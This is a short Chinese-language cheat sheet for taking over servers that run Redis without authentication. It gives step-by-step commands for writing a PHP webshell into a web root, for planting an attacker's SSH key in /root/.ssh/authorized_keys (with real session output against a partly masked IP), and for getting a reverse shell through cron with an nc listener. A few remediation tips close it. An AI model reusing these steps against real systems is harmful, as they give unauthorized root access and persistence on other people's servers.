總結一下redis未授權拿shell:
redis-cli -h ip
>info 查看系統類型
Windows:
1.找網站絕對路徑
2.config set dir 絕對路徑根路徑
config get dir
config set dbfilename indexbak.php
set webshell "<?php phpinfo();?>"
save
Linux系統:
第一種:寫密鑰
第二種:寫crotab反彈shell
第三種:找絕對路徑寫webshell
1)本地生成秘鑰
root@GanDolf:~# ssh-keygen -t rsa
2)將公鑰寫入一個文件
root@GanDolf:~# cd /root/.ssh/
root@GanDolf:~/.ssh# (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
3)連接redis寫入文件root@GanDolf:~/.ssh# cat foo.txt | redis-cli -h 210.73.90.xxx -x set crackit
OK
root@GanDolf:~/.ssh# redis-cli -h 210.73.90.xxx
210.73.90.xxx:6379> config set dir /root/.ssh/
OK
(1.39s)
210.73.90.xxx:6379> CONFIG GET dir
1) "dir"
2) "/root/.ssh"
210.73.90.xxx:6379> config set dbfilename "authorized_keys"
OK
(1.03s)
210.73.90.xxx:6379> SAVE
saOK
(1.40s)
210.73.90.xxx:6379> SAVE
OK
210.73.90.xxx:6379> exit
root@GanDolf:~/.ssh# ssh
4)連接服務器
root@GanDolf:~/.ssh# ssh -i id_rsa root@210.73.90.xxx
二、 利用方式不需要猜 web路徑,寫到cron里面
然后本機nc -lvv 2333
一會兒shell就彈回來了。
修復建議:
1)修改默認端口
2)監聽本地端口
3)使用非root啟動,否則出現漏洞1,直接拿到root權限
4)修改配置文件,禁用相關命令